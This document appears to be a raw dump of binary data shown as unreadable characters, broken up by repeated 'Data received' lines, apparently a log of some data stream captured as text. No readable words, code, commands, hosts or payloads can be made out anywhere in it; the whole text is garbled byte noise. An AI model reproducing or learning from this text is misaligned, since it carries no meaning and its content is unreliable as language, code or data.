f^Æñ9†¡NŒ·W,‘•G™¾ÃÔÜpaþBȬÙÆøy2eÄïozÎ~¾ÑH‘• íì…Ù‘Mþ8†!‡Lêòf".H3jܜ(TU ê|Àd(ÜV4Xú£2qø…°uäœigו Pßß#ðdb.y¦ÄV¬»6=YE'¤Ã¿e¨ìDU•Ûjeü”×3n¥¹P¦ H+ʄK6ÿ0è¤4?>E@™šãìgQÉÎÃÜÀ À–qáàžºË÷Ù¯ìì™:xgv· ùјx±‰ÊÄŸH ¾Ø5o Á‰¢fW³^Î F¡xEüÞ˺UHí22 ÉLa×t,ú÷W¯-<y™Qö³>z[…ò˜Õ¨èë¸|؃EP @,Ü 6¦(ÿà™L!Ñ
Data received ö+s§Ì´d|Ê¡6§Æþª²žïîol±øæô ~/•Z_ö Q…Ui͇x2båk’<›Ñ–q=s]¢ÜÇx)óã·Î³iMa™û˝ƒ©"ŠaHUöˆ£ðŸ Ó¥þ zE±Ñ`ŠéÈBx«)Å·DwŒ0a`3% ÆZH–Xy¯po9½FàV§ º?|X–~GµŸøDéµÊÈhÕ»`·Y1ΰ=èÀ™Šte-É( Փø1îµD‰w‹5©ž[ùՍî ϸ‰L͆;îಠéJYÛ4‘#B![C¼&ðÅBUû ²ÆIJƒ?úegb¹j4ؔԓV¹v˲Àè/+*¿…\U82¼ý€±Xçò/Ç ’¿vÃ~2³‰²ª?Ð꧎[¾¾T³D´ «üA^V¸šÇ[”ÆS›/…‹™1ÀRè¹® ‘9h¼R½ÏÃöuÆîs‡À[?ãÖñ×;ÿ¦žñ «¾ŸL†w͉zÏ®ƒ©{ Î¡´ÉãðO‚‘ÿ¸rè4>FËÑg 2¼©ë¢å`jObMúyvÇÆêß&øP§+Rüë¯é‡òqn@]ªâG eiï4IT!Ù9¹{¦øÖ¥ºÙg4ž::àÑê+O>\ÛN'DO ßÝo;hì”é:k‹þïƒÒ Š¡ ›w;lžß5Å6©g„ÊzNüN”¹?¶¶)«sDÕË#3=¦56³ÚŽDޜÿ¥¨ÎC¦&þ$ËÊ/ÎY}M„¼»ê%-ۑãNï&¯ÑpÿÖ¾¦%Ì9÷ )i³q$Jބ®nÛ p¨›NO«C ›»Á“91ʝæj¼±Yçš4FßBC|ð×G¯­ÝÖ¬#e©Y$àÑè]¸_RÝãH‚µÖ¯=ԖéϑòRw-ÉÛe#§wêò¼IÙ]î~jiÎ&º{ãÁ¯´§ÂÞ °<mvÍ¦ÄÑåh>MT¶Ý„ kÑFÏf ð+ /¹1ûúŽ=›#E ÚÏWî¾#.—±Û„ˆ ¦!¢->l•µ¤ûÑ?¼rôtŬ‘=ŠŒæÜsý/§Ëuöó mÐI{f³®»…2œØô#þŸO¬©á¸ìÈMdk(~Xí¥ïâiF< o¬ô¢®¿*HÂPÝ83Ðæ$/ÖÿµÉf"ÎC) µ4À4!{¬¤$8fpcÝ×ïWq%t8Ø»=¡JSõ¯ÚR²€6ýGÓŸ¯_°9æî|ì£=‘9<b>¡Ûá½~¯üÈö°9Ï 'Ñ&—´å|.¦#¥=»w‘¨7¡¼RV¶°¦­ #âvÚvóî] X¶ùðXèçԖ!±ÚQ3’øýYë)}“áÀÔù<óTm3óã!á°ÏÅÖ©óQ„TÖxJ< |–DpÖ J‚Gúh”^ôüå¼Kþ\ÙÿrnÎ`6脌‘¯ŽûæçØC™Eµ²øö}´ŒÐþ´õ&è´j!òÖëŽUwð9RºÂ¡)m‚˝¼!¿[.n6QÁʖº*“óâ-pͅ¦†¶ƒ6/ÖÈ¡9·È|`Cºù]ó¢òlÑ+ÀGƸ’4É|¦ˆpâ¯Ó%Ù3{`kyOZ˜­qŠ ¤ Däg|Å$*0ûq€Qs£àôO¡6áv·ú­ôí¬ü…¨`Qít±-YÊþjJa2R¤;ȳÒÏ8K[öG¨†±é• §µ“PrkÂF<ž;iÍ.•n3ô”rƦWdxŽ‰äÐìFx½]‡QÝLi¹98nãûŽuú\j …/éÚêS±ï¾¬èÁ+ûœ¹nª};"·
Data received 덕kj,ùfyW1B¨yJ®î+…òɐ´sÏV‹¡97¦²^çïNH¯í3(oÔ$+¦ðÔÚ ó¿¶ðîp1LJÊr~úó6ý#£([y´ûHœõë Gïl—8Ëô|~Óϒ­<GY[ÔóN5ý@˜ŒvS=¬¾U˜Oû³Š•Óď O߸^ÔH pkÓ&Š¿jÔ [¯s£Hºˆ?ëKüQ½8=_·êYkõWGBfÞÁî}˜jõŠß0¸vl"çVü±›¢1Ÿ˜öìAïjL'ÝÛý¤YÕ_AV#'ÉcIùNVÞNªÿ‘vËñ>†Ä» ¡ I±Â£o ÇWþ }°)QÉRíýþi=%,N˜L“Aªì\æ(þXGmG‘ä¿n@±…9Ÿ¾2ku@A¯´CÚAXèv¿&§Ûà.ZVµZxŸ ·"ýRœeeÏÀªkÀ —!ºÌN¬h²E*\è;ž2ljK¯Á¼m‚¦^§Þ}ã¢<tÓ[̊Ž¶¯×··hKáF©ß­‡ÒQvLÏÔÚr/þ·ÎÒ°gŒÕ×m&gŒ¸l¿µ¸W cgç0ÕWe!W°Oü~mñꀠ£"ÔdEû‡C«Ò†¸L“û¿Š>ŸC& .”G°vµ“ô VÊÄÿ}t à™Yƌ—‚!QŽ= b)›|«K?¨qb.;^J¦À¯™Ä*:²Ö¯+ÄL:ڜ9š3‹Å)yŒY“ÒAQF>Rµ ¸åÚKf´jJš‹ÎAñ°› ^­Å3 Vd2s˜òs­*#vܟ}Ušñô¼¦Hîö¢Uõ‚\¥-«û—{X|ÐÌöŇDšš›'„¾¢"F<+¨šck‹¶%^Ãݍî­´‡3,α·Š¤C´šÿ®ø +Oˆ„-ÿÞ^¼ ìfXeáÌ:ZQÓ;:™ }7]´¤qy[§È$Åï{;†9&Úý&B˜DYÿgÉÔH†—ZHƒAõqŸH•I,ŠàÓ:®oóÍ?…Tê¢Ñ¼ò–˜^JÒã«¥ÂD­éiâ=`šdQùƒà]yöXî¼Ìú”gö‡‘o‘ÀÁÿ”ôjÈò3ÅZý„HôœÉL.àA.¸ñ]÷{,ßóé=2=³*ÆjÄõG‡É#;OÉí ahy~ïìiN»p}{TÝa}eÁϊ(Ÿè(®¤cÎN~‰û}ÃÇ|&þß²Ù0îî’2gûü¨Äñdi±MŒ?Mõ·°öìÖµá¦vÌ4Ønyž€Àí<¡4ÒWí8dKGI‰6'ね1*×1µúü“=`A@5éAú¡à,„Ó:Ʌqi­èҞW—³Jp˜Yìmœ=И+þ<y>{®HHy]{Ir•ó¯³18[ ‘vM2§“Pkä~ÊðI÷˜±ëÖiûB}¦^Ÿ%m… ­Æ­Îÿ$)KJÒÕÁÎí4ÀÂçìò))ö.!Ä[¸2NÞJ«Ê2A‘S ñ°”×X.òÍnx,˜¿Øâò‰Øۛõm0r>$¾—Q*ì5‹$›!™†·PZÅތ#ëõ±êMõÄ(M“Ÿb‹Å¤›“;U[÷…ÍÚ~ uq7aÇx1Œ¤]• |ôTå(5E¡Ý©:”­âÄɪmןU×ې-ñ©ÚP§Å5˜ë"ÙEÚJ›¦`)Ëj˜àòÀ.LLPÝ Š ¿,)HÐ 4y»|°MW¶ï§›¿‰ ƒ`(e5´ŽI{¶Éš 6ë°}’?Á‡ ß þ¦š{Ãþø€¸özýªŸ7` Ž
Data received Ù•~<7RŒÒþß½Û£yGLC?x
Data received ºeÝ]SA†ÆgBà¦-¬LÊçœÌDÏ;»Š±›Ëðg;)o*eÑê|Rl•ƒFÁ¨,×\ïjÌ+áW¿ ?âÿƒi°(Ø4®t`~7c5À‡Q&.ÖÝYY³°»‰´hÚBCē=( |õêY¡ÝŸ'e°ãj€9ҖBqu…ÅÙ i'ÚC1̯´vë€g¼”Ài&¡×”ù‘Z¿{Šv¢ºÇ—¯è®‰zÛØ°\ù©QÜééÆ_ʁ‰ÁÈàF¨97Ä8Ë=ƒTBãÖŒv݃ىÿk®¾«x1iF€-_–2â­°,êä.ÐzJéÝgÌà½QÕƒ®0›X¹Ûðá5 9i´ùgŠî? ‰}g ¹0Tbž-œ:c¤Mq7Œ+w«-“ %†·°,Á6²i˜x„4wp&|xDsë“VY7`[aÇÍuúmSíȟ>À4ôI¡u<’‹–ÿc՟éš#§ú«K-ÂÓ!­ØíöKèǃ%'¡z-Å´|*ҟaXîÓëü½î0 Ãn\ÎDZbï©bÉÙI'f•@áp·ž‚ôÏƵ1¿& ù)B­r\„ žÇ/}ˆ%ažUZ0.=å(–õځKßlä”ûißÖ¬C¹œ Qc iúh¶¢kœ¦yÃd9ÐtÏÝA¦o;½ÛXf¤g†0N¿j³wÑ[ïçÿM££ÃO˜§ºxfà’È­‡§š‡cBL󄊈ܹ ’ûrO‹×aƒè7ªý˜ã>*,)lÛÝÓ®a/¢¼¸ÀãÛÓè'yG°x㠍½‚× S¥Q§|éÓfxešum9þñó½ôY"€c8š=¾½(»< ߦ‚935f j¶dgI bÜsg#iV¹Ffì:Euó:€} ‡F»O Æå˜A¢™§‡=‹AÏ(ùJÁ™«í½D€†½ %vË$h,n¥›‚ö}úÿÝe͔'w.Ñ=Ľç̦W÷o8q.`«à3§‰¾)ՙî³1ôš4!P܍'6 „³×ÓQBuö™I]ïáa[Ò~Ò? VȐšÐí1þÃýE <¥ Zá+‡KVJgEJe‹ßÿ¢œ”ôÎω덹Û€(\4éþÐÚ cZÃL½8jÂh6¯j0yaÿEùØ=>sá;)qߧ5jÕ&™ì’4<aÓ1ôKP”––ö+,¦Œí‘'òùÖö¼´þ"R­‹hxG # ÞXOKþ£•/vG¥~ìg“½­Ñeîu5F¢Édö‰ø¡ &5æ«Ý¢¨óԜßO1ûVe±WƛÍQ”9j<¬¼Èóƒú)jY׏̝8@QWÐw´ ˜¸ŸÅA~+]<¥³êÙםü$ˆ‰÷¢Ê큡~‚Û˜ÃÚ4 9&ùA±»(Ʀ¦¿>a†¬{3¹„|ŸÐåûèr)c†®KEÔ<µ?ÉïZ( gݝ‰(Ì `ÃbÓ‹Å¨ŽU}måbóæÛ®»n?°;#´+l‡Ë^[ðöuª´öq*õ|Rr{<ÛÀà[4{™ÞʀZ«^xÜýFåËÊìϙ¸· JӉ Tdù}®µ!¤4fr2¯ÙÅúm<ž# Ô'9Ï )¥=ŒxþæÕMÅÞºœíRxCwàBÔ´[Ѻ*Ö o” KD—\¶ñK¼NM&Õ4šøo"9/T0áP®kœ'ZyÍòøÏV Èe OŽs‡¨Îlxq-ÿðA„öùæ8u¨F…†e&öã¸y x
Data received MùžcU&¨ð>_”•ì?òÞác<¶ãçNU|$Êïë ³‡Õ #˜é]²ü¸I–!=Ñ«tbyY»0ªà8´‰Gç,tߑó;§KõÁ.ýh³Ü—ÿá_þèÕwˆž¸ÙGYM¸÷H{„¢÷‚¢ ˆa|?é<hP­üÉu`ŽÔR°C¶«Cw±É ¾c Iæ7ݕ¹®9³¡ •ˆa§Î'3^ža.šú8)½!à†©1€èSØ¡u¤Ta„¯ÔT¨õŽŽg%!1äíødNHfóZàÃ¥þk“‘`. ôÉÌ?¬x± _øƒÚêÄ°´ö¡I,­bê~´0wJè¿-…ÇX‘ülLœ†‚ø¥×oÞtföØãq%óB‹÷õŠäf1zo†ªN.pæ­@©.Ëð,}4£¯/¶J‰N¥4W÷Ž'Ì0Ö߇ýíë3Br2A9X·§#</ÛÌȔD¸$›¾Õ”“»ýoe¤Æ!ün`ĈkÇî$'ÁY•#Ü;äßþ ¨‚$rþ„Üãú'"X0hÃ3`¡kF.…¡Èœn?¥Ú›'[+ÖË&2_ÚÚ#€YŸ·Ho‹h´ñ®×‹anâ¨õ٘ Π¡º³è1{Z9ð_Nª–Ðê_•¶œöÒgOûø/w9kbôï(DpööÝ–ɾ¯¼6f­ÕYçÜýóã<ûXßìµA=%`‚4ÈÊÀ#D¹Øÿr)—®ßà†§Y)ù©7¶‹%± þþý}½œ5+ž¢Þ3xO•Zž%s4Güo©{õÕÉSê9IEf½åQDxW…çÉv¯pÊÓmê͜š fÚ惭ÅÒYÏã“'¬Ž3¤{÷BúOÒ8;` ÅC$h…GeI“‰$ó<lVLó9=ÙwÍÈjZ,ÖÝxÔñb¿YcjL_ä1ǽ‡™2¡nC—IqÅ%£ÒÃ2“þþä–dj ²‡P‹dSˆý_¸Z‡]AκmÆ.Jj=ƒµ¸lÃނ•kÞ~¤<§yé^: `$ %_Ù.éâ5‚¡…'À½—“3Q·­çe žhZ.øˈ€S"=ÃAö‚.vŽVÊîuNxçŽÃ­MzVò[ÓãŽ4ÐAðöZïå\ãFIÆE^¿Dq÷¨ÿ=DÜì‰ñ4 P™4 %¼!ëãÊé²a[Ù~hE +Òá¿ñcð.§µÁíUV`+éHgæ}Åáœ;xE‰5›ÌŸGë5_rÓ©¥:Ù`_¿Ç,פ[®L€örÁËlҝÃàK½œÁhåÂõ ø$|6´'ð† |’f™H‰I4íMÛïÆê*[Ā<©ëKÚ^cd7ÏMâÅà¸> %¤f]좝r? Þ/Múýè?ÿïnÆS–®?T§¶+ÎRž`O"Šiˆg¡ÜÝŒI;ö“ö·{Ù¬kH9»¦ .s4z¸¯ãC4•_À@™ëðë<ƒžùþÅpùÿ֝•ì„ó ó•~ëâkÒmÝñA²“žƒßh @íE°bò©XØÅÝ©iømC@CWtÞ{®­…ëþ‚ß]É·ãïýdL¸©e Ôª Šý¸î£Êf} ôΏO¾·f#Q)š«Zµ=¤SpÚåUb34\e»¾ë½sèZ‡XMT§ 1 –a·Šd75îÕkíz¹ääŒGd€à}ü@ª§õ?ܸ\}ýMÑê1† ñsƒ¿ìãP6À:4¯ïˆ­·C°y¿å3Üý1ýX Eâw¦è÷Œ7Íÿ}FqTÂÜã+ÿÏøN?Ø]þK¢µ
Data received fGþoÍGDz¨ÙcҒlpYé[«!¬h…3Ú>³"€0‡‘M¸o.2¿¾0V£ñ «æZ–Åehüômiv{_v’!¼"øX—ù'®ô÷=Ï)’½´Á’8 ½SÔ-@y æ·°z.!ˆ¬¤*ìSÖVŸÖ¹E†'éwSæ¡Î¬¦1Ð ´¬6FF}TLËmC0̍Çþ(j1ËjÒbBE岏"ì1ð3¯¬Î,5x"·eWVÛL^N›Ÿ—X?)“°˜"ת†,i%ÂlZð aC©•‡Ç¢­åNusþi¸uº³ ãk ý›ôKóðdR%¬[ä% ©½Æ7S™ñ Òj…=r•¯¾Ùä~崚þV'òèJIÌæù…zÔØ졾¸2­í÷U/Fðjíé]z{|“Kö°BĨòä &‘&í£ø£x Ô\;Eöï®øþžÄùa¦8µ3øˆ­~xšF@hâT"ÀˆÂRÙwANÜ»+p!d⢒º@#ßȞW\‡×âÈ2ŠL[ÆçªF‰V’¯>¼æý] jÈÂmñßÓheÖÆt¸Eª9Ñݹ¾­×J^ëâë,ǏfÌD¡œ ¤Òj¥uY|ö­ª¸^Ÿ ·Ð_m—«µ3èZÞª‡lÚNZ>¾ ]l$‘«6Û+Õ#–qwƒ303ÛtI”€õKq1ô-*qØG_ô„ŸªÃ_.>~]­îð™Pâ:’ÝV’‡üiìhvÓëÿñþ‡¾8†}Ççfÿ«”õ b¯Æà ô÷šiº¡„c}B¨çm¬ýË¥C¹¸Õ¢ÂݶŠ,U!Ù%­å»LÌñµ*’ Yüé#eƒ¾‡]X^×wÊ¿j¯qt<BôwÊëõu†ö;´“ÓÁ(ȏE%Y­²idqW,¾œêI¨lÈQÄ´öÅÄÇDÖ^Ýü%˜©iþ­Q>TÄ.ÿ£öL{Øíû ‹×ûì0IoN0¶‰½†d‰R›‘짧£R÷¤f¹¶­¨Žó•n;½=¶¹G-îD(g½{nø}j›¾ ¡ûEU Øã®^ôݚ@ˆý:&ZáDSbK)²[—Á‰þáë7à©äEM³…ĤÒl¯„éä÷Æ¿ÈGu$g;ƒ¶=e‹/o6¹bqîcLy1÷› õ%—ø3bÉוN© ÅñB*°íÓÌiޏš@‚pžte¦Z÷“Âk؄ÿŸñnò}oW¯™TÕ~‰gW+Á¸4¥>'‡¡KÙóx< Ëú¨ée}ëqyX]ÜZtmK˘vn«tkØDQ[‰ñ[×íñ•!…o× ®ãtÏ1ðçð%hDŽS½ÕÉÁ¥±Vö3óe3Üq‰Ú¾5u4Kõ}¼¿™»ÅÃ7›`aˎ)Š.×ûh&ͦ»€Åí«¸D@zC䘻FZOÉ(¥T—ÛéRӝ‹6ü÷5œæœL¸õÃ8gùkoÆ]ª3Ä=Æ4sÚï=­ÖÛršô 9ØL€…-¾ª>iŽK™];’§Í·D›ºú`äxëc©*þ&)@YajâÛû¸ÅNY‡­f)ùaRK¼Ëo›æÙwG¶øå"°‰yvv©ž4vïÿC{»ê4À¿Ï‡¡É«è§v  ~‚y‘ýK$L4ñ°(0Ô!"„…º92TiðëŸüÍ5MMkÌ剞xVAø2W¬VÎ^È_½ð‡Ÿ­Ž«h¸!mlE`+ÊüXò"?€ñþÕQYI»£.»u#x³·ëý óÃûf˜¡Ç›(«zlȽcæþQ¢
Data received ®伍€þIòV ~ˆîm(ÿ=®Èÿ{« ã~¹˜/XjÑ&Õtä­dY÷ÝPàNsÞcrpíý~,TªÃU«Â¯üÃómΗhÞ*x'ÎÓkLÂ唆±ÝNxÝÍê²»ÆU¬³ºeœÄa»œÓ¾eҕYh¤ÇñÖ9f}Â{Ið—ÈKºl«œ3ÊP`Ûk®ã×Ã~yž…˜/P[ƞ¾8µ2"VƒéÖJ{Á?4ÉM¯§BüqgâIuŠú¯æO(×c¶‚1…eZ™㎠`þœ×vþ f—ÂÃêÏôó¶z«/'šÞSM¤¬÷³5´©^8¼§Ê҅ø芀4јÖU{mVž$Ú¯¶lr ù Þ¡§\8’ëe©­Í£¬{j»*ÝÃòíWɅÐ>C†¾Hã¡ÿ*ótŠPù¹ Hó׶ë?iR™šIür T µž¹Ö0¬Ç§ãUü÷6Ð:7»ëi“%Šµ½ypw‘!h´Û5ÚªúZŠ' öÒÙ²Ž%zLOÏ1¯ŠŠ–· _…ã_¤`Kɍø½3³^1ž+‡ÏÓ7ߙ"t¡¸é––£ÒóôDÞg5Ä9W³Ë¦»óo eÔ÷·ƒÍ݃ÿ4‘J„íó–߸Ü\©}šßp66­ï±Ð5óUš´»JžØDX9½ž|Úd|;ÓÑ”B^®è Mkw쏄ŽE^·YGµm,–VÊûìºZPx«0Oâ0èÃ5¿|é ýõ¶ƒ5ÎÏÚ~ã%¾R(ÑØ8 !ãÖ “£)üº. í;‡Ýô þ9€à•ºxò7Å,ê‹7éÛNçÃ,èfsW£&à7¼¥ ±Æ>îÁ0‚Ò} ïæI­ԆÑ=:ÐH«â»­áÿ :oŽK—ú=Ϙüœ½N“#$;{˜G6Ê=9‡m`¬é¡yuH<‘â/Žà¶:"\­ùPÇÓY]nÔ¯QghÁÚ.K¼VWè&‡è¸MA·E£h¦++¯;uÀé;¿Êt¼`‹­nyˆ êpJôü©*"çŸÖ ûˆvKÙùÁXkúÀI¸äÿŽBœR[uaˆ^9†éKWh?®å—Ûì€duV”ìèÁò+Lj®õ؋]¹t÷ê‘]ÊB5DЌýÝ@2Ü­4ÕÃêb)úší 05›ÃZïÒ ËR\®?¸·=Ë ¼-–kó–_ÚÂûzî#<@Áç¤-± ÝE7Zÿz35ÏPR8äÿó¡Æ|båËÓ@¿64EËCqÞ@ʪμ•µ (%× lI|AqWhO³`¬.{y]èûᨂ#Îö¶̔º Ao7Œc«Gúb÷Jîn" 2à4mŽâØÃ[âó/Ǘu¦Oð13Eò@ÖsýÃkÒjá6j ·ºP˜ÈJ…{ŸÔÐTÀ® %SHìG?TîTÿïpʺ¿ëimT¥Ú:öé8F“,>Kô £È8°ÑÞ Ë7ؘáЦàšÌn@êSq–,Á¹cØf8ä?c¼æN±<#G3\ñŸgf¸ˆGæX٘‰@r"Ì!Š‹+˜‚CÚBˆ-zÖ>t4Q`š±¨ ÃhËQmðž5‡]K|Èmí5ëÙÓÊΨðTÚ1&pï¿õx›;ô!5—k40u¥Ex|pÿŸ˜T'òr±KZ,(®'°…Ɔ©FlHð'%ÈÞn²scI¤ˆ‰¢TÀÕËhR¥%Íú?ìëö®š ›¬ª£Ôò;Mù îîÚ®½Ô9Ž2Ž@Ìüó£ù¤¢­Žgy‡Þfð
Data received I_²æž`û.·¤Ú©ûŒd»hØrR¯
Data received j „z ø©Ý8Xn0Qî;’I ±õ÷g5"ãÎ2ÿ’HüçP(lâVõóä#!õ}ޟºžö€;ìbÀ€.á‰!]PB)OzJë•Cj³ÅºZÞgፃCÄFX¼Á;Êóc…竬ÃúɄxsÛÌ$1;ÃY©Íp›Ó˜¡Óџu€/•ýåÄ#.”d÷Ú)?Â?îiòŒåiÊÙ"½9as5gˆ¹="";œ.籙n}íõ°_f à÷{H{‘4pÿ®ÏFӖ8ÛäÖs‚ü -WcM6ú‡ø]cü5Aòé&Àvl“IÀA»åHi\<@Õú+gù–]]ՋDŠ½ ‰!ÀG c6suÖ;™æ²¸¸nÅã &>ÎRÖi(˜äÝb+˜Œ`¼k¡vôë¯GMgÜÆå^å)M‡iÛ ¦R† ßQbJpÿiúÂÞ+¿ŠjÍ¢w¬æ‚À(Þã á1Ÿz²a”Á{^ïC©˜ÁÇñô嗉« Të:6­¡ýÚ'«£Y–º±)±Ìÿ ñ¦+ŸF#…}p¨]û2>Ükü–¸ÃY-ÇÕN–V¥Ö*Éêä؛{}¢eV²&Û(q˗xŽ÷³^ô·‡vކfêb ÿ^ü³‹ˆôv­X “p„*}—¤Qp²ãíˆÿ÷‰H<qž¹XäSRÆ0eðޖ?.ÄÜq0+fOú±„vÙ#s¢nÒ'ÿ¥(*mE}» ¬¦Fg€Î¸o$~ ó/bñȍN©a÷.Gñìp=”>Ÿ†x³EgH/LK®°Íʼ³GÆìÀ‰$è¸ b)´Ê\güܚåãÌåZAaO†Rßç‹÷ˆY·Kþg–¡ºQk‡}Ì!ÿ ê‚é¼Ï>zì?*´z­×°™:´ÕGäܬ8P”LV…þvöÝÕµA…ê l͊í;@͔õxêkÓ £ê۔›ojS…F©íޘy!iÑøKhá\»Ž—j:^x8DæQÉÞÈJž"¥mGñ:…ñ1&‡9\;®¬HiëìGéwdÑ Zxñò#'6cØÆÙ°üxa©zê5¬Þ©6úºΠRæXՓ@¨_¥sÁð i¼ÏnËU…ÆÛ (ßAËùãõMÛõûô$ÉÒ.l «¨5ÙSÒ/wgE®‹â”‘ÔŽ-Ì]“•°O‘—k#A[9Ÿ—4@/Ǔ)!öÍQã91ø1¨#9Pb¥,ÀREøƒ-L֌†4‘£‰¤5œÄ±ó²:5Bv•¬´ÔS–8ùèhƒWçTþ*«Úëÿ¢£ùÔ+}-Šh1ö ”ò÷`ªêŠÈ°3PÊ5oMtÍïèâþÞ$1—uÑou !tx7ß Oñ.a6òúû3`ÜÝQÐöÿ¸{ ºÄ`ݹ{qeàëa›ƒ)f? €Êô~ sÀM¸C¤ÊʧÁœBF‹3°ô¬ X¡ÈíÞ8áޅù,x¬,ƒ:æmõG÷¾-¥²– ÊÝØ_n$@•ð“—+1[‡²语—Nÿh,uýY@³b©Ž?µs#“ò©R…QÄêKˆ¤GPŽ3`gîàÍï4:ðL æÀ‡dŠ«ÞÜ͔i!º‚ßO/Rîö‘q7Èo: hŒqÐِV÷#n9ûǨ;:9¥¾ûNOVçSë[—r ¶Å|:ÿ˜kþÎɅŠw\›Ç¤{±¬¹¶^Hb0e¥jRhxëøkP¶¿<”*g“„&&Ó}6
Data received P
Data received yáÁÂÎk ±_m©7ZùÈȪʅO‚6gàb=;—å"xåñ‡àññ¨…¡>rnMf,i¬ ¦7J6Ò{ï¾FO¥­ÊÊIɉ_RóüJèB¶i©û€ÎÁãÜ(û#5»Äÿ‡†­‰ñ=¥Nçø$S ;ÌövŒðhÀz¢mÑjA8’› Þq‚Ÿƒ<?ò&kÒb{C·Rß[Y¢1st棠P×ðKû`Y!3ÒÚ0ÆM©0Gòؒçü’ “ÿöx`èʋy„¥Erÿ§êØR½|Ŭ1ÇÐà½kôhYŸ,°©Œ¹™Û£] é‰Lð*¶3âR«uÒLÓ¼öGvŽJhWŠÈñv OmÇÒwB±áuGÈéñì‹Dø¢Q½*'¼3ß34A×Qºe|¯ ߞ w¿¥¯[bÉâð¢¢íl·.‰ ™0§z¹5›!û¬…>ûY«cHë½-OëÓç2?¡w¹c릠Ö­TcQg‡öš¡ýPõC%'Ã4˜•2nâ‘ñl®§ew±ì¾Ð¯sUhÁ©­$¬ºé±0K,.;± nqؚ ɗ¯‘ç3±ÈL‹ÿ'ç_hÂۂþd5i#OþòHhO,øÞP¼<#ÏýÀ"H|í8 ?w´z{Kw1¦·UÌd4Bc“‹?b­ºáÖ É$üÞTrñ*‘Éd\[½~è¤mFãµÇ¨‘L6Ž½O±ªÀ39SjzÄ mR°/Éû/åÝËUYbJü£®n®5ƒþ‚ºLFéRˆÅáÌfÖݹ*~1<aø¸c`eð8:ËqKàïŽóʒÛݽ}8£3xٗÙʱâYΨMM ‡Ul}ïNf®LHò=ªxQÖµŠ nC—.× ÷1aÙ¾,y¯¼r& wÎÿªIe­ãVÓ¶4Ç8ÀúørgTIfˆ75ÇY«;UÍiىF·ù A€Ë¼0¯bQԕ¶RÅ»À”x}äDǀÁ}ۂÅ,éÈKC;¦,…JdÎh‹?Q6ψ–l÷–>—eA}Ë՘îb¨4½]›Ÿ‰‘9¯Õ 0|‹A±èbØ_\ø\‚Íà«°\i/ä,öLgqQ
Data received b«7XZ¶ÖXá”ø#'Î =í>ù¨·:¢NÊyglŠ¦ßhƔƒñiÓ:Þ^~÷…nÔ¥¹çVöËÀäÑö~*{hôä! gÒ»üҗwT³H„€øfk!Mbgr>‹Õº'Åèú÷2Š*>NÕK¹ç½½G×ÄQRƒGøPÂh¼¯î½°ûO|Ä“c <O`\÷)?4l¶ÌJª6³4½ËüÃÈøZ;èàá^ o…¯(%œ¬t¦Äv­) ‰yðµ¡)ù}½¼"©éèx X. àvÎ'”w˜ÔÚ»˜Âpÿ6Au…íFëqZIÙԓ‰¿Ò<a.ä˜pi”‹Ñ?— ô@ƒ¿â‚45bPtVÞ ”Ï©+u'hBÄë0¦P™îA#£Rr¼©3óê7Lf‹3ív¢H܆î"øT1ªCn¹JÚoGDà8ˆ@–Ã(Ñ8‰îñAþ›­ûéÌeÂ,2îÅ1 ›s½âoSהå–|ŒEiœ¡Ó¬#ӑ6ƒJßÕ¿n6³ü›]sYÓbW©º\ÉBÝÐ(a˜èϮDžvUŒ%|&õ}cŸ†à—×Ô'/$ÛKе…ªlJ 0\Ôéˆ<{Õ/h•öÿc?‘ä ¢œ»xUL¥Œ¦íª˜›kd¥cµc?¸g€Ã–+ŒŠ-T[:䛷'Yá'Uîw°DKaÁ¸C‚Þ9ßÂJ×äT£ïñt-§ fþ À3هYX„“ü¡çý_ú˜ÁŽTÇÁØ7@µÍvÌÑÛ&+&稲®±õÔÜç ÌN9ë1I•9Þ&©a«sÍ/ØÝ<û›ç¨:F~ô]çŠXj+Òj_´Ð™Gs&ž!!%C?¸fðâl£5åÖ¸ á =DL…GÓÕtfH¶tº7ä ò ì{S="œAU¦A ¸ùJ¸ØaÓBª!ä¼Ol*=j”f±Ú g…ªÃúFåz¤ÖTu\ŸÃv/;”ùß O- hWŠ‚é­c£ê*ÕJ·"Ur ÕB~E€Ùcw%:63 {­ƒb¦^]^Öò2‡=œ¹0Ԍ¢ÜtûÌêû3‰Ã­“Úe$\^”›ý4 %Ÿ:u÷M×mVŒ/»Gð«¡›ÿŒ§vaüFä}ïÕíÐ2ý³æmïÍg£®¶Ó"¸éïÿՄÓÈ=MÕeêk÷’ÿÔSˆÎã#Ã`?TS©º±í4S€icª”›fù¢´$ÙùÄ ‡~Ò=¸ŽXšÝ¶ie"y@sÑý—Ý.­´P>´¹Ì‰c[Éeÿ´,Hö4QøCi™ía(¦Èiýþ‰Ë¥vSˆG›:™[w®AÆ:y3€Ü„Lö³ÎÔéÁû¥æÒò¥lð_ÑA¢Ù1¼xciîõ:l— ãbDz“ÈҮЬ‘mm_b~®rLÝ¡l½êW„Äh·õüT¸îìJ·‚Põ"{WÕ2¸tþÒc\ßoÌ_@ñ䠝³´AÏù'à:ÓiN¨bs&`7ÛôϨtìIàC1“"¶Á²øô‡mЩ Ëà†2÷P¦z³nO‚]£-HÞ mÉß0S#…µ¦‚//|º«ù¥Ã¨%$·ò„ÓÜÑCJ)aÁ•L à— \ÜN…{ð~•••øڟë’MØ0Ú£üïóCGgz J^fç֛=0Ëù°Ö|O”ç»Ú+u>&…H[¸1L_ÔK¡Š'xúÚw$4bÙìÄ]Vô¦½_,<7¼m¥~UȂÌÙý _{”y< ˆ¶¤Ó;Û¨¾ýф÷_­¾ç¿~Ñ»Ïí÷;¾óVÞSF«Èº{èA¦¶-R4ú æy#
Data received ‚–. ÓÇìBٍÇêÕÌIɇ]Œ„ ëÉïàf²`éÙz>ò |öÞv RA›el¦ÓE)ÍØ¿(C[P)²øáÅÈɉíàÜ[PRŃï~p’šÙÕeÅNgH'¯oR¥¨ê"XSÊÃNHÏ»Váè"h}We¶p3á(6DP*gÃ6²Œæf4Ë )ò Î¸õwm´Ðò‹Üü²½Üœ>øˆ‚8Ô{³ßy–ÊF:ԏ+Û ä*"H{»¤öÌ9¨õ‡¿ÖQ7/§~¹…C ôù:ŒÙÉâ›ÆµáÏè&óAʔ­ˆý™Å¤Ãá7»“éŠÿ_Ц)!•ø”œÖ¡JùÍûôÏAMY5àÔµßߤ¬¤…äàãÆ„§‰@Þ¢+Š‘†”± v…3VÀ– Þ*ˆÚ됅·«if®;œ÷)07ð</´Ï–Œ7³6;*Z¶¿®þv‰nOŒªzœ¡¬øE—è"ÿêÓq¹˜ —…鹐3›Ò҂þÐêbQ,Ú»—ex¦v`Å.š¹d("]nŒäŸDÑ=1äú¥‡éÖöÙÉôýcÖàù”sÄù-& 